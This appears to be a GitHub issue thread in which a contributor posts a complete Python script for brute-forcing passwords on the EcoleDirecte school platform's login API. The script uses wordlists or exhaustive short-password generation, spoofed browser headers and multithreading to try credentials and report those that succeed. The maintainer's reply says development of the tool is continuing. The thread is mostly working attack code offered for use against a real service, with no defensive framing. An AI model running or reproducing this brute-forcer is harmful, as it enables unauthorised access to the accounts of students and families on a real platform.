### ISSUE TITLE
Added multithreading + Random

### ISSUE THREAD

**Issue by WoufLeDieu** [Terminarox/EDSecurityTool-ecoledirecte-brute-force#1]
`import requests as rqs
import itertools
import concurrent.futures

APIVERSION = "4.19.0"
liste = list("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890")

choix = int(input("[1] File List Bruteforce\n[2] Random Bruteforce\nChoice: "))

username = str(input("Username: "))

if choix == 1:
    wordlist = str(input("File list directory: "))
    open_wordlist = open(wordlist, 'r')
    #realines() > readline au cas ou
    wordlist_lines = open_wordlist.readlines()
    
if choix == 2:
    passwords=list(itertools.chain.from_iterable((''.join(l)
                               for l in itertools.product(liste, repeat=i))
                              for i in range(1, 3 + 1)))
    

class login:
    def __init__(self, user, password, version="4.18.3"):
        if not isinstance(user, str) or user == '':
            raise ValueError("Bad args !!!")
        if not isinstance(password, str) or password == '':
            raise ValueError("Bad args !!!")
        v = version
        user = user
        password = password
        token = ""
        header = {
            'authority': 'api.ecoledirecte.com',
            'accept': 'application/json, text/plain, */*',
            'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36',
            'content-type': 'application/x-www-form-urlencoded',
            'sec-gpc': '1',
            'origin': 'https://www.ecoledirecte.com',
            'sec-fetch-site': 'same-site',
            'sec-fetch-mode': 'cors',
            'sec-fetch-dest': 'empty',
            'referer': 'https://www.ecoledirecte.com/',
            'accept-language': 'fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7'
        }
        # try a password
        data = 'data={\n\t\"uuid\": \"\",\n\t\"identifiant\": \"' + user + '\",\n\t\"motdepasse\": \"' + password + '\"\n}'
        url = "https://api.ecoledirecte.com/v3/login.awp?v=" + v
        response = rqs.post(url=url, data=data, headers=header).json()
        if response['code'] == 200:
            token = response['token']
            header['x-token'] = token
            id = response['data']['accounts'][0]['id']
            email = response['data']['accounts'][0]['email']
            header['origin'] = "https://www.ecoledirecte.com"
            print("Successful authentication " + user + ":" + password)
            exit()
        elif response['code'] == 505:
            print("Authentication Failed " + user + ":" + password)
        else:
            raise RequestError('Error {}: {}'.format(response['code'], response['message']))
            

def try_login(password):
    inst = login(username, password, APIVERSION)

with concurrent.futures.ThreadPoolExecutor() as executor:
    if choix == 1:
        executor.map(try_login, wordlist_lines)
    if choix == 2:
        executor.map(try_login, passwords)
        

`

**Comment by Terminarox** [comment]
I have added multithreading and I am working on a random function for bruteforce.
Think you about your idea.
